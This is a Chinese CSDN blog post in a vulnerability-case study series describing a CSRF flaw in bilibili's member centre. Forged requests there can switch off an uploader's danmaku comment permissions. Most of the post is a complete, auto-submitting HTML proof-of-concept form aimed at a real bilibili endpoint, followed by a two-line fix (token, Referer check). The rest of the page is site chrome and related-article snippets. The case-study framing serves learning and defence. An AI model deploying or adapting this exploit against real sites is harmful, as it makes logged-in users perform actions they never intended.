【漏洞学习——CSRF】bilibili某处csrf漏洞

最新推荐文章于 2024-07-19 00:30:00 发布
最新推荐文章于 2024-07-19 00:30:00 发布
阅读量3.2k 收藏 1
点赞数 1
分类专栏: 【渗透测试实战】 # 乌云漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/84390831
版权

漏洞细节

此漏洞可以针对up主,关闭下列三项弹幕权限,使其发稿视频没有弹幕!
csrf位置在用户中心-->过滤管理中

http://member.bilibili.com/#gl_manage

poc

<html>
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title>CSRF/exploit--bilibili</title>
   </head>

    <body>
   <form action="http://member.bilibili.com/video_manage.do?act=save_filter" method="POST">
      <input type="hidden" name="format" value="json" />
      <input type="hidden" name="accept_guest" value="0" />
      <input type="hidden" name="accept_spcmt" value="0" />

      <input type="hidden" name="accept_advcmt" value="0" />
      <input type="hidden" name="block_group" value="" />
      <input type="hidden" name="new_filters" value="[]" />
    </form>
   </body>
 <script>
      document.forms[0].submit();
 </script>
</html>

修复方案

(1)加上token
(2)验证reffer

 

FLy_鹏程万里
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
爬取bilibili再也不用头疼了,bilibili-api一步到位!
tongtongjing1765的博客
07-30 1万+
前几天在github上看到有意思的项目 —— bilibili-api,作者是个二次元的宅男Passkou。以下是该项目的地址:https://github.com/Passkou/bi...
漏洞学习——SSRF】bilibili某分站从信息泄露到ssrf再到命令执行
Fly_鹏程万里
02-22 995
漏洞细节 这个只是memcache的案例,如果是redis更好利用了0x00 前言 扫描器时常会扫描到一些信息泄露,如discuz的配置文件 /config/config_global.php~  里面时常带有数据库密码等,但又苦于内网,十分尴尬。0x01 个例分析 以bilibili这个为例 http://bbs.biligame.com/config/config_global.php~  ...
常见漏洞CSRF
最新发布
weixin_54799594的博客
07-19 1168
学习网络安全过程中的小笔记
PicGo配置Bilibili图床
米不开朗基罗的博客
02-03 1247
Picgo 配置Bilibili 图床 picgo-plugin-bilibili 为 PicGo 开发的一款插件,新增了B站图床 图床。 使用用户动态的图片上传API。填写SESSDATA即可,获取方式在下面。 在线安装获取B站SESSDATA图片样式解决B站防盗链(403) 在线安装 在线安装 打开 PicGo 详细窗口,选择插件设置,搜索bili安装,然后重启应用即可。 离线安装 克隆该项目,复制项目到 以下目录: Windows: %APPDATA%\picgo\Linux: $XDG_CONF
CSRF是什么?
别抢我蓝buff
02-09 444
跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作...
csrf 与 samesite
mgxcool的专栏
01-13 2246
很多人在学习csrf的时候,书本和文章上都会写到,在a站点面嵌入一个b站点的链接,那么浏览器在请求b页面的资源时会自动带上b的cookie。 不过我觉得这些文章的内容已经有些过时了,近期在解决内部的一个csrf问题时,发现当前浏览器已经默认启用了cookie中的samesite保护机制,这种跨域的csrf想利用已经很难了。 简单来说就是服务端在返回set-cookie时,可以加上一个samesite属性,这个属性有三个值:lax/strict/none lax:跨域的请求不会带上cookie,不过如果
基础漏洞csrf挖掘实战
10-07
这种攻击不依赖于受害者自身的行动,而是利用了网站在处理请求时的身份验证漏洞。 **CSRF攻击原理** 在 CSRF 攻击中,攻击者首先需要确定受害者已经登录了目标网站,并获取了有效的身份认证。然后,攻击者创建一个...
CSRF漏洞的靶场实验
09-19
通常,CSRF漏洞出现在那些没有进行CSRF防护或者防护不足的表单提交处。 4. 构造恶意请求:根据文档中提供的信息,模拟一个恶意链接或表单,这个请求在用户不知情的情况下执行,应当能触发预期的非授权操作。 5. ...
CSRF漏洞详细说明
02-26
经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。通常情况下,有三种方法被广泛用来防御CSRF攻击:验证token,验证...
hucart-含有CSRF漏洞的源码.zip
12-31
在这个案例中,"hucart-含有CSRF漏洞的源码.zip" 提供了一个实际的示例,让我们深入探讨一下CSRF漏洞的原理、危害以及防范措施。 1. **CSRF漏洞原理**: CSRF漏洞通常发生在Web应用程序中,这些应用未对请求进行...
CSRF攻击和防御
mubanxia的博客
05-28 266
CSRF攻击和防御 CSRF(跨站点请求伪造)存在于这样的情况,一个宅A登陆B站,输入了用户名和密码,通过验证后,B站产生cookie信息并返回给浏览器。A没有关闭B站,在同一浏览器下打开了黑客发来的网站C,网站C中隐藏着一段功能为获取B站cookie的代码。此时恰巧B站和A的session尚未过期,浏览器的cookie还存有A的登陆信息。那么A会在自己不知情的情况下,用A自己的身份给黑客发去cookie。 CSRF漏洞检测: HTTP的头含有一个referer字段,这个字段包含了HTTP请求的来源地址。如
3行!仅3行代码就能抓取B站(弹幕、评论、用户)数据
weixin_48794920的博客
08-06 973
今天介绍一个获取B站数据的Python扩展库-bilibili_api 可以获取的数据包括: video-视频模块 user-用户模块 dynamic-动态模块 这次用“Running Man”十周年特辑的视频,来做个获取弹幕的Demo。 我是对比 没有对比,就没有伤害,就像最近的“哈工大”某学生和“浙大”某学生一样。 这是之前获取弹幕的过程: 1、弹幕数据接口 https://comment.bilibili.com/123072475.xml (一个固定的url地址 + 视频的cid + .xml) 2
通过bilibili_api获取bilibili弹幕+绘制词云的方法
weixin_36285139的博客
08-04 1091
通过bilibili_api获取bilibili弹幕+绘制词云的方法 刚接触python 随手做一些自己感兴趣的项目,看到了一个通过bilibili_api三行代码获取弹幕的教程(vx公号:天作之程(jhtmtzzc))使用的是bilibili_api ,是2020年1月份发布的接口,可以很方便的获取弹幕、视频信息、评论等。 由于自己学艺不精,后续词云的简略代码没怎么看懂,梳理了一遍把整个的学习内容记录下来。主要参考的为bilibili_api的教程和词云的生成教程(https://blog.csdn.ne
通过bilibili_api获取bilibili弹幕+绘制词云的方法!
爬遍所有网站
08-28 1837
由于自己学艺不精,后续词云的简略代码没怎么看懂,梳理了一遍把整个的学习内容记录下来。主要参考的为bilibili_api的教程和词云的生成教程(https://blog.csdn.net/itanders/article/details/88858415) 自己的环境:python3.7;pycharm编译器 一、bilibili_api获取弹幕 这部分代码如下: #爬取bilibili弹幕 from bilibili_api import Verify from bilibili_api.vide
网络安全-跨站请求伪造(CSRF)的原理、攻击及防御
关注网络安全、云原生安全
08-08 1万+
目录 简介 原理 举例 漏洞发现 链接及请求伪造 CSRF攻击 不同浏览器 未登录状态 登录状态 代码查看 防御 用户 供应商(程序员) 简介 跨站请求伪造(Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF .
bilibili获取up主基本信息
a185934139的博客
08-23 3139
-- coding: utf-8 -- import scrapy import json from scrapy_project.items import BilibiliItem class BilibiliSpider(scrapy.Spider): name = ‘bilibili’ allowed_domains = [‘bilibili.com’] ...
《一个小时,学会黑客技能》——以前BiliBili上面的那个视频中的那个网站,我终于又找到了
hanshou101的博客
10-26 1903
可能是最好用的网上教程。
bilibili源代码泄露,go-common
热门推荐
JiuJieGuDuKe的博客
04-23 1万+
今天各个群都在盛传的事情就是大B站的后台源代码被人传到github, 短短几个小时,star将近1w,fork不计其数,让我们来回顾下前因后果。 首先是程序员聚集地开始发openbilibili的github项目(https://github.com/openbilibili/go-common),现在项目已经被删除,空空如也,从这个用户来看,肯定是有预谋的操作,新注册的用户,注册完之后吧源代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值